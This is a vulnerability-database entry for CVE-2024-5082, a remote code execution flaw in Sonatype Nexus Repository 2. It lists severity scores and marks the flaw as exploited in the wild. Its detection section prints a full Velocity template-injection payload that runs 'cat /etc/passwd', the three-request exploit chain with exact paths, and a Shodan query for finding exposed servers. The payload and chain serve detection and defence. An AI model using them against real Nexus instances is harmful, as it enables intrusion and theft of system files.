cbcvebase.
CVE-2024-5082
published 2024-11-14

CVE-2024-5082: A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2. This issue affects Nexus Repository 2 OSS/Pro versions up to and…

PriorityP277high7.1CVSS 4.0
AVNACLATNPRLUINVCHVILVANSCNSILSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.86%
76.6th percentile
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2. This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.

Affected

1 ranges
VendorProductVersion rangeFixed in
sonatypenexus_repository2.0.0 – 2.15.1

Detection & IOCsextracted from sources · hover to see the quote

urlPUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml
urlPUT /nexus/service/local/repositories/releases/content//.nexus/attributes/com/sbt/ignite/ignite-bom/maven-metadata.xml
urlGET /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml
command#set($engine="") #set($run=$engine.getClass().forName("java.lang.Runtime")) #set($runtime=$run.getRuntime()) #set($proc=$runtime.exec("cat /etc/passwd")) #set($null=$proc.waitFor()) #set($istr=$proc.getInputStream()) #set($chr=$engine.getClass().forName("java.lang.Character")) #set($output="") #set($string=$engine.getClass().forName("java.lang.String")) #foreach($i in [1..$istr.available()]) #set($output=$output.concat($string.valueOf($chr.toChars($istr.read())))) #end $output
path/nexus/service/local/repositories/releases/content//.nexus/attributes/
othercontentGenerator: velocity
  • Exploit is a 3-step chain: (1) HTTP PUT of a Velocity-templated payload to a Maven metadata path, (2) HTTP PUT to the hidden /.nexus/attributes/ path setting contentGenerator to 'velocity', (3) HTTP GET to trigger server-side template rendering and retrieve RCE output.
  • Step 1 PUT must return HTTP 201 for the exploit chain to proceed; monitor for unexpected 201 responses to PUT requests on Nexus Maven metadata paths.
  • Step 2 sets the contentGenerator attribute to 'velocity' via a PUT to the /.nexus/attributes/ path — alert on PUT requests containing this path segment combined with the 'velocity' content generator value.
  • The Velocity SSTI payload uses java.lang.Runtime.exec() via reflection; detect Velocity template syntax (#set, #foreach, getClass().forName) in HTTP request bodies to Nexus endpoints.
  • Shodan dork for exposed Nexus Repository 2 instances: html:"Nexus Repository"
  • Successful exploitation returns /etc/passwd content (matching root:.*:0:0:) in the response body with Content-Type text/plain from the GET request.
  • ·The exploit requires valid credentials (Basic Auth) to authenticate to the Nexus Repository 2 instance; unauthenticated exploitation is not demonstrated in the template.
  • ·Affected versions are Nexus Repository 2 OSS/Pro up to and including 2.15.1 only; Nexus Repository 3 is a separate product and not affected by this CVE.

CVSS provenance

nvdv4.07.1HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck7.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.